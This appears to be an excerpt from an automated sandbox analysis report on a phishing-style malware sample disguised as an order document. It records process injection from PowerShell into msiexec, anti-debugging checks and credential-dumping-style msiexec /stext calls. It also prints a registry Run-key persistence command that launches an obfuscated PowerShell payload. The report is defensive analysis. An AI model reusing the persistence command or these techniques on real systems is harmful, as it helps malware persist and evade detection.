            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6401Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3256Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
            Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2824Thread sleep time: -6456360425798339s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 5604Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_0040687E FindFirstFileW,FindClose,0_2_0040687E
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_00405C2D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C2D
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F510F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_22F510F1
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F56580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,6_2_22F56580
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407EF8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_00418981 memset,GetSystemInfo,10_2_00418981
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\nonopposable\ff4\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\nonopposable\Jump to behavior
            Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\eq
            Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\eq
            Source: powershell.exe, 00000002.00000002.2608136076.00000000053B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\eq
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006B82000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006B44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-3819
            Source: C:\Users\user\Desktop\Company Profile and new order-202401127.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-3821
            Source: C:\Windows\SysWOW64\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_11-34015
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04CAF520 LdrInitializeThunk,LdrInitializeThunk,2_2_04CAF520
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_22F52639
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,10_2_0040DD85
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,10_2_004044A4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F54AB4 mov eax, dword ptr fs:[00000030h]6_2_22F54AB4
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F5724E GetProcessHeap,6_2_22F5724E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_22F52639
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_22F52B1C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F560E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_22F560E2

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 4460000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kyeljthgepgkbumddfxbvgcpb"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\nsjeklaasxzpdjihuqsuylwgkeqq"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\xmowlwlbgfrcopwtdaewjyjptlizvdg"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Loaded" /t REG_EXPAND_SZ /d "%Salutbatteriernes% -windowstyle 1 $Psammous=(gp -Path 'HKCU:\Software\Absinthium\').Emulsifiable;%Salutbatteriernes% ($Psammous)"Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "loaded" /t reg_expand_sz /d "%salutbatteriernes% -windowstyle 1 $psammous=(gp -path 'hkcu:\software\absinthium\').emulsifiable;%salutbatteriernes% ($psammous)"
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "loaded" /t reg_expand_sz /d "%salutbatteriernes% -windowstyle 1 $psammous=(gp -path 'hkcu:\software\absinthium\').emulsifiable;%salutbatteriernes% ($psammous)"Jump to behavior
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
            Source: msiexec.exe, 00000006.00000002.3307439894.0000000006BDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerZ3
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 6_2_22F52933 cpuid 6_2_22F52933
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
